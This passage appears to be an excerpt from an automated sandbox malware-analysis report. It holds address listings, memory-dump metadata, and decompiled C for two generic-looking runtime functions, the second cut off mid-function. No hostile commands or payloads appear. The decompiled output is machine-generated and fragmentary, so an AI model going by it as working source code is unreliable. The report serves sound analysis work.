                    0x0167d919
                    0x0167d919
                    0x0167d634
                    0x0167d634
                    0x0167d634
                    0x0167d634
                    0x0167d640
                    0x0167d8bf
                    0x00000000
                    0x0167d646
                    0x0167d646
                    0x0167d64d
                    0x0167d652
                    0x016cb2fc
                    0x016cb2fc
                    0x016cb302
                    0x016cb33b
                    0x016cb341
                    0x00000000
                    0x016cb304
                    0x016cb304
                    0x016cb319
                    0x016cb31e
                    0x016cb324
                    0x016cb326
                    0x016cb332
                    0x016cb347
                    0x016cb34c
                    0x016cb351
                    0x016cb35a
                    0x00000000
                    0x016cb328
                    0x016cb328
                    0x00000000
                    0x016cb328
                    0x016cb326
                    0x0167d658
                    0x0167d658
                    0x0167d65b
                    0x0167d665
                    0x00000000
                    0x0167d66b
                    0x0167d66b
                    0x0167d66b
                    0x0167d66b
                    0x0167d66d
                    0x0167d672
                    0x0167d67a
                    0x00000000
                    0x00000000
                    0x0167d680
                    0x0167d686
                    0x0167d8ce
                    0x0167d8d4
                    0x0167d8dd
                    0x0167d8e0
                    0x0167d68c
                    0x0167d691
                    0x0167d69d
                    0x0167d6a2
                    0x0167d6a7
                    0x0167d6b0
                    0x0167d6b5
                    0x0167d6e0
                    0x0167d6b7
                    0x0167d6b7
                    0x0167d6b9
                    0x0167d6b9
                    0x0167d6bb
                    0x0167d6bd
                    0x0167d6ce
                    0x0167d6d0
                    0x0167d6d2
                    0x016cb363
                    0x016cb365
                    0x00000000
                    0x016cb36b
                    0x00000000
                    0x016cb36b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0167d6bf
                    0x0167d6bf
                    0x0167d6e5
                    0x0167d6e7
                    0x0167d6e9
                    0x0167d6ec
                    0x0167d6ec
                    0x0167d6ef
                    0x0167d6f5
                    0x0167d6f9
                    0x0167d6fb
                    0x0167d6fd
                    0x0167d701
                    0x0167d703
                    0x0167d70a
                    0x0167d70a
                    0x0167d701
                    0x0167d710
                    0x0167d710
                    0x0167d6c1
                    0x0167d6c1
                    0x0167d6c6
                    0x016cb36d
                    0x016cb36f
                    0x00000000
                    0x016cb375
                    0x016cb375
                    0x016cb375
                    0x00000000
                    0x016cb375
                    0x00000000
                    0x0167d6cc
                    0x0167d6d8
                    0x0167d6d8
                    0x0167d6d8
                    0x00000000
                    0x0167d6c6
                    0x0167d6bf
                    0x00000000
                    0x0167d6da
                    0x0167d6da
                    0x0167d716
                    0x0167d71b
                    0x0167d720
                    0x0167d726
                    0x0167d726
                    0x0167d72d
                    0x00000000
                    0x0167d733
                    0x0167d739
                    0x0167d742
                    0x0167d750
                    0x0167d758
                    0x0167d764
                    0x0167d776
                    0x0167d77a
                    0x0167d783
                    0x0167d928
                    0x0167d92c
                    0x0167d93d
                    0x0167d944
                    0x0167d94f
                    0x0167d954
                    0x0167d956
                    0x0167d95f
                    0x0167d961
                    0x0167d973
                    0x0167d973
                    0x0167d956
                    0x0167d944
                    0x0167d92c
                    0x0167d78b
                    0x016cb394
                    0x0167d791
                    0x0167d798
                    0x016cb3a3
                    0x016cb3bb
                    0x016cb3bb
                    0x0167d7a5
                    0x0167d866
                    0x0167d870
                    0x0167d892
                    0x0167d898
                    0x0167d89e
                    0x0167d8a0
                    0x0167d8a6
                    0x0167d8ac
                    0x0167d8ae
                    0x0167d8b4
                    0x0167d8b4
                    0x0167d8ae
                    0x0167d7a5
                    0x0167d78b
                    0x0167d7b1
                    0x016cb3c5
                    0x016cb3c5
                    0x0167d7c3
                    0x0167d7ca
                    0x0167d7e5
                    0x0167d7eb
                    0x0167d8eb
                    0x0167d8ed
                    0x00000000
                    0x0167d8f3
                    0x0167d8f3
                    0x0167d8f3
                    0x00000000
                    0x0167d8ed
                    0x0167d7cc
                    0x0167d7cc
                    0x0167d7d2
                    0x00000000
                    0x0167d7d4
                    0x0167d7d4
                    0x0167d7d7
                    0x0167d7df
                    0x016cb3d4
                    0x016cb3d9
                    0x016cb3dc
                    0x016cb3dc
                    0x016cb3df
                    0x016cb3e2
                    0x016cb468
                    0x016cb46d
                    0x016cb46f
                    0x016cb46f
                    0x016cb475
                    0x0167d8f8
                    0x0167d8f9
                    0x0167d8fd
                    0x016cb3e8
                    0x016cb3e8
                    0x016cb3eb
                    0x016cb3ed
                    0x00000000
                    0x016cb3ef
                    0x016cb3ef
                    0x016cb3f1
                    0x016cb3f4
                    0x016cb3fe
                    0x016cb404
                    0x016cb409
                    0x016cb40e
                    0x016cb410
                    0x016cb410
                    0x016cb414
                    0x016cb414
                    0x016cb41b
                    0x016cb420
                    0x016cb423
                    0x016cb425
                    0x016cb427
                    0x016cb42a
                    0x016cb42d
                    0x016cb42d
                    0x016cb42a
                    0x016cb432
                    0x016cb436
                    0x016cb438
                    0x016cb43b
                    0x016cb43b
                    0x016cb449
                    0x016cb44e
                    0x016cb454
                    0x016cb458
                    0x016cb458
                    0x016cb45d
                    0x00000000
                    0x016cb45d
                    0x016cb3ed
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0167d7df
                    0x0167d7d2
                    0x0167d7ca
                    0x016cb37c
                    0x016cb37e
                    0x016cb385
                    0x016cb38a
                    0x00000000
                    0x016cb38a
                    0x0167d742
                    0x0167d7f1
                    0x0167d7f8
                    0x016cb49b
                    0x016cb49b
                    0x0167d800
                    0x0167d837
                    0x0167d843
                    0x0167d845
                    0x0167d847
                    0x0167d84a
                    0x0167d84b
                    0x0167d84e
                    0x0167d857
                    0x0167d818
                    0x0167d824
                    0x0167d831
                    0x016cb4a5
                    0x016cb4ab
                    0x016cb4b3
                    0x016cb4b8
                    0x016cb4bb
                    0x00000000
                    0x016cb4c1
                    0x016cb4c1
                    0x016cb4c8
                    0x00000000
                    0x016cb4ce
                    0x016cb4d4
                    0x016cb4e1
                    0x016cb4e3
                    0x016cb4e5
                    0x00000000
                    0x016cb4eb
                    0x016cb4f0
                    0x016cb4f2
                    0x0167dac9
                    0x0167dacc
                    0x0167dacf
                    0x0167dad1
                    0x0167dd78
                    0x0167dd78
                    0x0167dcf2
                    0x00000000
                    0x0167dad7
                    0x0167dad9
                    0x0167dadb
                    0x00000000
                    0x00000000
                    0x0167dae1
                    0x0167dae1
                    0x0167dae4
                    0x0167dae6
                    0x016cb4f9
                    0x016cb4f9
                    0x016cb500
                    0x0167daec
                    0x0167daec
                    0x0167daf5
                    0x0167daf8
                    0x0167dafb
                    0x0167db03
                    0x0167db11
                    0x0167db16
                    0x0167db19
                    0x0167db1b
                    0x016cb52c
                    0x016cb531
                    0x016cb534
                    0x0167db21
                    0x0167db21
                    0x0167db24
                    0x0167dcd9
                    0x0167dce2
                    0x0167dce5
                    0x0167dd6a
                    0x0167dd6d
                    0x00000000
                    0x0167dd73
                    0x016cb51a
                    0x016cb51c
                    0x016cb51f
                    0x016cb524
                    0x00000000
                    0x016cb524
                    0x0167dce7
                    0x0167dce7
                    0x0167dce7
                    0x00000000
                    0x0167dce7
                    0x00000000
                    0x0167db2a
                    0x0167db2c
                    0x0167db31
                    0x0167db33
                    0x0167db36
                    0x0167db39
                    0x0167db3b
                    0x0167db66
                    0x0167db66
                    0x0167db3d
                    0x0167db3d
                    0x0167db3e
                    0x0167db46
                    0x0167db47
                    0x0167db49
                    0x0167db4c
                    0x0167db53
                    0x0167db55
                    0x0167db58
                    0x0167db5a
                    0x016cb50a
                    0x016cb50f
                    0x016cb512
                    0x0167db60
                    0x0167db60
                    0x0167db63
                    0x0167db63
                    0x00000000
                    0x0167db63
                    0x0167db5a
                    0x0167db3b
                    0x0167db24
                    0x0167db69
                    0x0167db69
                    0x0167db6c
                    0x0167db6f
                    0x0167db74
                    0x016cb557
                    0x016cb557
                    0x016cb55e
                    0x0167db7a
                    0x0167db7c
                    0x0167db7f
                    0x0167db82
                    0x0167db85
                    0x00000000
                    0x0167db8b
                    0x0167db8b
                    0x0167db8d
                    0x0167db9b
                    0x0167db9b
                    0x0167db9d
                    0x0167dba0
                    0x0167dba2
                    0x0167dba4
                    0x0167dba7
                    0x0167dba9
                    0x0167dbae
                    0x0167dbae
                    0x0167dbb1
                    0x0167dbb4
                    0x0167dbb4
                    0x0167dbb7
                    0x0167dbba
                    0x0167dcd2
                    0x0167dcd4
                    0x00000000
                    0x0167dbc0
                    0x0167dbc0
                    0x0167dbd2
                    0x0167dbd7
                    0x0167dbda
                    0x0167dbdd
                    0x0167dbdf
                    0x00000000
                    0x0167dbe5
                    0x0167dbe5
                    0x0167dbee
                    0x0167dbf1
                    0x016cb541
                    0x016cb544
                    0x00000000
                    0x016cb546
                    0x016cb546
                    0x00000000
                    0x016cb546
                    0x0167dbf7
                    0x0167dbf7
                    0x0167dbfd
                    0x0167dbfd
                    0x0167dbff
                    0x0167dc0b
                    0x0167dc15
                    0x0167dc1b
                    0x0167dc1d
                    0x0167dc21
                    0x0167dc21
                    0x0167dc23
                    0x0167dc23
                    0x0167dc26
                    0x0167dc29
                    0x0167dc2b
                    0x00000000
                    0x00000000
                    0x0167dc31
                    0x0167dc34
                    0x0167dc36
                    0x0167dcbf
                    0x0167dcbf
                    0x0167dcc2
                    0x00000000
                    0x0167dc3c
                    0x0167dc41
                    0x0167dc43
                    0x00000000
                    0x0167dc45
                    0x0167dc45
                    0x0167dc47
                    0x00000000
                    0x0167dc4d
                    0x0167dc4d
                    0x0167dc50
                    0x0167dc52
                    0x0167dc55
                    0x0167dcfa
                    0x0167dcfe
                    0x0167dd08
                    0x0167dd0a
                    0x0167dd0c
                    0x00000000
                    0x0167dd12
                    0x0167dd15
                    0x0167dd2d
                    0x0167dd2f
                    0x0167dd32
                    0x0167dd35
                    0x00000000
                    0x0167dd35
                    0x0167dc5b
                    0x0167dc5b
                    0x0167dc5e
                    0x0167dc61
                    0x0167dc64
                    0x0167dc67
                    0x0167dc67
                    0x0167dc6a
                    0x0167dc6c
                    0x0167dc8e
                    0x0167dc8e
                    0x0167dc91
                    0x0167dc93
                    0x0167dcce
                    0x0167dcce
                    0x0167dc95
                    0x0167dc9c
                    0x0167dc6e
                    0x0167dc72
                    0x0167dc75
                    0x0167dc77
                    0x0167dc79
                    0x016cb551
                    0x016cb551
                    0x00000000
                    0x0167dc7f
                    0x0167dc7f
                    0x0167dc81
                    0x00000000
                    0x0167dc83
                    0x0167dc86
                    0x0167dc88
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0167dc88
                    0x0167dc81
                    0x0167dc79
                    0x0167dc6c
                    0x0167dc55
                    0x0167dc47
                    0x0167dc43
                    0x00000000
                    0x0167dc36
                    0x0167dc23
                    0x00000000
                    0x0167dbff
                    0x0167dbf1
                    0x0167dbdf
                    0x0167db8f
                    0x0167db92
                    0x0167db95
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0167db95
                    0x0167db8d
                    0x0167db85
                    0x0167db74
                    0x0167dc9f
                    0x0167dca2
                    0x0167dcb0
                    0x0167dcb0
                    0x0167dad1
                    0x016cb4e5
                    0x016cb4c8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0167d831
                    0x00000000
                    0x0167d800
                    0x016cb47f
                    0x016cb485
                    0x00000000
                    0x016cb485
                    0x0167d665
                    0x0167d652
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eba27d8e2e52b400886fcb44593776b87c3489636728e0e651e6b2befa1cdf63
                    • Instruction ID: 26449c88bbb29b358d11c24fd3e6a087f95ea737cc18bef244999d5e4d877819
                    • Opcode Fuzzy Hash: eba27d8e2e52b400886fcb44593776b87c3489636728e0e651e6b2befa1cdf63
                    • Instruction Fuzzy Hash: 6CE1DE30A0136ACFEB25DF68CC90BB9BBB2BF45714F05459DD90997381D770A982CB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0167849B Relevance: .3, Instructions: 290COMMON
                    Download Yara Rule
                    C-Code - Quality: 92%
                    			E0167849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x173f9c0);
				E016BD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1757b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0167CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E01682280( *[fs:0x30], 0x1758550);
						_t139 =  *0x1757b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0169F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0167FFB0(_t193, _t235, 0x1758550);
								L5:
								return E016BD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E01661C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1757b9c; // 0x0
							_t235 = L01684620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1757b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0169A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0167FFB0(_t193, _t235, 0x1758550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L016877F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L016877F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1757b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1757b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E016A37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1757b9c; // 0x0
									_t214 = L01684620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E016A37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1757b10 =  *0x1757b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1757b04 =  *0x1757b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L016877F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L016877F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1757b08 =  *0x1757b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E016A57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E016AF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L016877F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0169A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L016877F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E016A96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                    0x0167849b
                    0x0167849b
                    0x0167849b
                    0x0167849b
                    0x0167849d
                    0x016784a2
                    0x016784a7
                    0x016784b1
                    0x016784d8
                    0x00000000
                    0x016784b3
                    0x016784c4
                    0x016784c9
                    0x016784cd
                    0x016784cf
                    0x016784cf
                    0x016784d6
                    0x016784e6
                    0x016784e9
                    0x016784ec
                    0x016784ef
                    0x016784f2
                    0x016784f4
                    0x016784fc
                    0x01678501
                    0x01678506
                    0x01678509
                    0x016786e0
                    0x016786e5
                    0x016786e8
                    0x016786ed
                    0x016786f0
                    0x016786f2
                    0x016c9afd
                    0x016c9b02
                    0x016784da
                    0x016784df
                    0x016784df
                    0x016786fa
                    0x016786fd
                    0x016786fe
                    0x01678701
                    0x01678706
                    0x01678709
                    0x0167870b
                    0x00000000
                    0x00000000
                    0x01678711
                    0x01678725
                    0x01678727
                    0x0167872a
                    0x0167872c
                    0x016c9af0
                    0x016c9af5
                    0x01678732
                    0x01678732
                    0x01678732
                    0x01678735
                    0x01678737
                    0x01678515
                    0x01678515
                    0x01678518
                    0x0167851d
                    0x01678523
                    0x01678527
                    0x0167852b
                    0x01678537
                    0x01678539
                    0x0167853c
                    0x0167853e
                    0x0167868c
                    0x01678691
                    0x01678699
                    0x0167869b
                    0x01678744
                    0x01678748
                    0x016786a1
                    0x016786a1
                    0x016786a1
                    0x016786a4
                    0x016786a8
                    0x016c9bdf
                    0x016c9bdf
                    0x016786ae
                    0x016786b0
                    0x00000000
                    0x016786b6
                    0x00000000
                    0x016c9be9
                    0x016786b0
                    0x01678544
                    0x0167854a
                    0x0167854d
                    0x01678551
                    0x0167876e
                    0x01678778
                    0x0167877b
                    0x01678780
                    0x01678557
                    0x01678557
                    0x0167855d
                    0x0167855d
                    0x0167856b
                    0x0167856e
                    0x01678570
                    0x01678573
                    0x01678576
                    0x01678576
                    0x01678579
                    0x0167857b
                    0x00000000
                    0x00000000
                    0x01678581
                    0x016785a0
                    0x016785a2
                    0x016785a5
                    0x016785a7
                    0x016c9b1b
                    0x016c9b1b
                    0x0167862e
                    0x0167862e
                    0x01678631
                    0x01678631
                    0x01678634
                    0x01678636
                    0x01678669
                    0x01678669
                    0x0167866b
                    0x016c9bbf
                    0x016c9bc4
                    0x016c9bc8
                    0x016c9bce
                    0x016c9bce
                    0x01678671
                    0x01678671
                    0x01678674
                    0x01678676
                    0x016c9bae
                    0x016c9bae
                    0x01678676
                    0x0167867c
                    0x0167867e
                    0x01678688
                    0x01678688
                    0x00000000
                    0x0167867e
                    0x01678638
                    0x01678638
                    0x0167863b
                    0x0167863e
                    0x0167863f
                    0x01678642
                    0x01678645
                    0x01678648
                    0x0167864d
                    0x016c9b69
                    0x016c9b6e
                    0x016c9b7b
                    0x016c9b81
                    0x016c9b85
                    0x016c9b89
                    0x016c9ba7
                    0x016c9b8b
                    0x016c9b91
                    0x016c9b9a
                    0x016c9b9f
                    0x016c9b9f
                    0x01678788
                    0x0167878d
                    0x01678763
                    0x01678763
                    0x01678766
                    0x00000000
                    0x01678766
                    0x016c9b70
                    0x00000000
                    0x016c9b70
                    0x01678656
                    0x0167865a
                    0x0167865c
                    0x01678752
                    0x01678756
                    0x00000000
                    0x00000000
                    0x0167875e
                    0x00000000
                    0x0167875e
                    0x01678662
                    0x01678662
                    0x01678662
                    0x01678666
                    0x00000000
                    0x01678666
                    0x016785b7
                    0x016785b9
                    0x016785bc
                    0x016785bf
                    0x016785cc
                    0x016785d1
                    0x016785d4
                    0x016785db
                    0x016785de
                    0x016785e0
                    0x016c9b5f
                    0x00000000
                    0x016c9b5f
                    0x016785e6
                    0x016785ea
                    0x016786c3
                    0x016786c5
                    0x016786c8
                    0x016786ca
                    0x016c9b16
                    0x00000000
                    0x016c9b16
                    0x016786d6
                    0x016785f6
                    0x016785f6
                    0x016785f9
                    0x01678602
                    0x01678606
                    0x0167860a
                    0x0167860b
                    0x0167860e
                    0x01678611
                    0x00000000
                    0x01678611
                    0x016785f3
                    0x00000000
                    0x016785f3
                    0x01678619
                    0x0167861e
                    0x0167861e
                    0x01678621
                    0x01678622
                    0x01678623
                    0x01678625
                    0x0167862c
                    0x00000000
                    0x0167873d
                    0x00000000
                    0x0167873d
                    0x01678737
                    0x0167850f
                    0x01678512
                    0x00000000
                    0x01678512
                    0x00000000
                    0x016784d6

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1b1a9e8397539689cb4232f8ceab6c9da942b032757961b2bf06cb5a5ca019d5
                    • Instruction ID: 84ca6cc01a8d90117ad67119fe8d11b05beb941d9499198e7429ff1582f4b237
                    • Opcode Fuzzy Hash: 1b1a9e8397539689cb4232f8ceab6c9da942b032757961b2bf06cb5a5ca019d5
                    • Instruction Fuzzy Hash: D4B12870E00219EBDB19DFA9CD84AAEBBBABF48704F10412DE515AB345D770AD42CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0169513A Relevance: .3, Instructions: 258COMMON
                    Download Yara Rule
                    C-Code - Quality: 67%
                    			E0169513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x175d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
